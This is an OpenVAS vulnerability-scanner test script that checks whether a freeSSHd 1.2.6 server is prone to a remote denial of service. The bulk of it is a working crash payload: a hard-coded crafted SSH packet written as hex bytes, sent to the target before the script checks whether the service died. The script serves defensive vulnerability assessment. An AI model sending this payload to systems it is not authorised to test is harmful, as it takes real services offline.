###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_freesshd_remote_dos_vuln.nasl 13568 2019-02-11 10:22:27Z cfischer $
#
# FreeSSHd Remote Denial of Service Vulnerability
#
# Authors:
# Sooraj KS <kssooraj@secpod.com>
#
# Copyright:
# Copyright (c) 2011 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.902803");
  script_version("$Revision: 13568 $");
  script_tag(name:"cvss_base", value:"7.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_tag(name:"last_modification", value:"$Date: 2019-02-11 11:22:27 +0100 (Mon, 11 Feb 2019) $");
  script_tag(name:"creation_date", value:"2011-12-26 15:15:15 +0530 (Mon, 26 Dec 2011)");
  script_name("FreeSSHd Remote Denial of Service Vulnerability");
  script_xref(name:"URL", value:"http://www.1337day.com/exploits/17299");
  script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/18268");
  script_xref(name:"URL", value:"http://packetstormsecurity.org/files/108149/freesshdremote-dos.txt");
  script_xref(name:"URL", value:"http://www.allinfosec.com/2011/12/25/dos-poc-freesshd-remote-denial-of-service");

  script_tag(name:"qod_type", value:"remote_vul");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2011 SecPod");
  script_family("Denial of Service");
  script_dependencies("ssh_detect.nasl");
  script_require_ports("Services/ssh", 22);
  script_mandatory_keys("ssh/server_banner/available");

  script_tag(name:"impact", value:"Successful exploitation may allow remote attackers to cause the
  application to crash, creating a denial-of-service condition.");

  script_tag(name:"affected", value:"freeSSHd version 1.2.6.");

  script_tag(name:"insight", value:"The flaw is due to an error when processing certain requests and
  can be exploited to cause a denial of service via a specially crafted packet.");

  script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
  of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
  release, disable respective features, remove the product or replace the product by another one.");

  script_tag(name:"summary", value:"The host is running FreeSSHd and is prone to denial of service
  vulnerability.");

  script_tag(name:"solution_type", value:"WillNotFix");

  exit(0);
}

include("ssh_func.inc");

port = get_ssh_port(default:22);

soc = open_sock_tcp(port);
if(!soc)
  exit(0);

banner = recv(socket:soc, length:1024);
if(!banner || "WeOnlyDo" >!< banner)
  exit(0);

req = raw_string(
		0x53, 0x53, 0x48, 0x2d, 0x32, 0x2e, 0x30, 0x2d,
		0x50, 0x75, 0x54, 0x54, 0x59, 0x5f, 0x4b, 0x69,
		0x54, 0x54, 0x59, 0x0d, 0x0a, 0x00, 0x00, 0x02,
		0x7c, 0x06, 0x5a, 0x3d, 0xb5, 0xf2, 0x23, 0x0f,
		0x6a, 0xed, 0x83, 0x4d, 0x36, 0xa6, 0xfa, 0x85,
		0x5b, 0x1f, 0x14, 0x00, 0x00, 0x00, 0x9a, 0x64,
		0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,
		0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,
		0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68,
		0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61,
		0x32, 0x35, 0x36, 0x2c, 0x64, 0x69, 0x66, 0x66,
		0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d,
		0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70,
		0x2d, 0x65, 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67,
		0x65, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64,
		0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65,
		0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72,
		0x6f, 0x75, 0x70, 0x31, 0x34, 0x2d, 0x73, 0x68,
		0x61, 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69,
		0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61,
		0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31,
		0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x72, 0x73,
		0x61, 0x32, 0x30, 0x34, 0x38, 0x2d, 0x73, 0x68,
		0x61, 0x32, 0x35, 0x36, 0x2c, 0x72, 0x73, 0x61,
		0x31, 0x30, 0x32, 0x34, 0x2d, 0x73, 0x68, 0x61,
		0x31, 0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68,
		0x2d, 0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68,
		0x2d, 0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9f,
		0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63,
		0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35,
		0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x72, 0x69,
		0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c, 0x2d, 0x63,
		0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, 0x61, 0x74,
		0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, 0x2e, 0x73,
		0x65, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32,
		0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73,
		0x31, 0x39, 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c,
		0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63,
		0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x32,
		0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c,
		0x6f, 0x77, 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63,
		0x74, 0x72, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66,
		0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c,
		0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, 0x74, 0x72,
		0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, 0x62,
		0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75,
		0x72, 0x32, 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63,
		0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x00,
		0x00, 0x00, 0x9f, 0x61, 0x65, 0x73, 0x32, 0x35,
		0x36, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65,
		0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63,
		0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65,
		0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79,
		0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69,
		0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73,
		0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, 0x72, 0x2c,
		0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63,
		0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x32,
		0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65,
		0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63,
		0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, 0x69, 0x73,
		0x68, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x62, 0x6c,
		0x6f, 0x77, 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63,
		0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d,
		0x63, 0x74, 0x72, 0x2c, 0x33, 0x64, 0x65, 0x73,
		0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63,
		0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, 0x36, 0x2c,
		0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x31,
		0x32, 0x38, 0x00, 0x00, 0x00, 0x1f, 0x68, 0x6d,
		0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c,
		0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61,
		0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61,
		0x63, 0x2d, 0x6d, 0x64, 0x35, 0x00, 0x00, 0x00,
		0x1f, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68,
		0x61, 0x31, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d,
		0x73, 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c,
		0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35,
		0x00, 0x00, 0x00, 0x09, 0x6e, 0x6f, 0x6e, 0x65,
		0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x00, 0x00, 0x00,
		0x09, 0x6e, 0x6f, 0x6e, 0x65, 0x2c, 0x7a, 0x6c,
		0x69, 0x62, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xaa,
		0xc5, 0x5b, 0x40, 0x25, 0x46, 0x00, 0x00, 0x01,
		0x0c, 0x06, 0x1e, 0x00, 0x00, 0x01, 0x00, 0x5e,
    0x04, 0xd6, 0x39, 0xec, 0x53, 0x1b, 0x5b, 0x86,
    0x23, 0xf7, 0xea, 0x73, 0x3b, 0xe6, 0xcc, 0x59,
    0xd6, 0x43, 0x9a, 0x40, 0xbb, 0xca, 0x11, 0x0e,
    0x1c, 0x2d, 0x45, 0x90, 0x24, 0x6c, 0xc2, 0xef,
    0x5d, 0xeb, 0x76, 0x62, 0x3f, 0x30, 0xc6, 0x18,
    0x11, 0x12, 0xc1, 0x68, 0xba, 0x4f, 0x1d, 0x25,
		0x3a, 0x6a, 0xeb, 0xe4, 0x5b, 0x6a, 0x5c, 0x49,
		0x6b, 0x59, 0x89, 0x42, 0x33, 0xf4, 0x99, 0x1c,
		0x89, 0x69, 0xb6, 0x8d, 0x43, 0x26, 0x1e, 0x03,
		0xd7, 0x68, 0xdc, 0xcd, 0xa7, 0x6f, 0x93, 0x5f,
		0x18, 0x5b, 0x31, 0x68, 0x62, 0x6d, 0x07, 0xa3,
		0xc4, 0x96, 0xcf, 0xb7, 0x60, 0xe3, 0xfb, 0xa8,
		0x2f, 0xd1, 0x0d, 0xd3, 0x09, 0xfe, 0xc5, 0x4a,
		0x67, 0xbb, 0xbb, 0x29, 0x45, 0xf3, 0x16, 0x08,
		0x0d, 0x27, 0x76, 0x87, 0x43, 0xc9, 0x75, 0xd9,
		0x07, 0x28, 0xfc, 0x87, 0xb5, 0xb3, 0x37, 0x74,
		0xed, 0x6e, 0x2e, 0xbf, 0x61, 0x06, 0x00, 0x1d,
		0x4f, 0x33, 0x42, 0xa8, 0xa8, 0x3f, 0xd5, 0x01,
		0xb6, 0xb7, 0xcc, 0x7a, 0xce, 0x53, 0x7f, 0x3b,
		0xb8, 0x3f, 0x2f, 0x0f, 0xf2, 0x1a, 0xf6, 0x24,
		0xf9, 0x35, 0x3a, 0xb3, 0xe1, 0xee, 0x2c, 0x5e,
		0xeb, 0xd9, 0xb5, 0xc3, 0x65, 0x79, 0x65, 0x6a,
		0xd5, 0xa5, 0xfe, 0xc7, 0x79, 0xc8, 0x86, 0x65,
		0xab, 0xf1, 0xce, 0xd5, 0x5b, 0x8a, 0xa6, 0x27,
		0x28, 0x60, 0xe5, 0x8c, 0x6c, 0x44, 0x82, 0xc1,
		0xb8, 0x30, 0x20, 0xe2, 0x70, 0x48, 0x7c, 0xf9,
		0x6b, 0x5c, 0xff, 0xff, 0xff, 0xff, 0x60, 0x53,
		0x4d, 0x77, 0x0a, 0x69, 0xbc, 0xc1, 0xc7, 0x19,
		0x63, 0x82, 0x7b, 0xa6, 0xe3, 0xfb, 0x8a, 0x0c,
		0x06, 0xf3, 0xbf, 0x64, 0xc3, 0xd4, 0x26, 0xe6,
		0x7d, 0x00, 0xd9, 0x0c, 0x67, 0x9e, 0xe2, 0x63,
		0x88, 0xd2, 0xef, 0x69, 0xf7, 0x35, 0x7f, 0x9b,
    0x2a, 0x68, 0x8b, 0x45, 0x27);

send(socket:soc, data:req);

close(soc);

soc2 = open_sock_tcp(port);
if(!soc2){
  security_message(port);
  exit(0);
}

banner = recv(socket:soc2, length:1024);
close(soc2);
if(!banner || "WeOnlyDo" >!< banner){
  security_message(port:port);
  exit(0);
}

exit(99);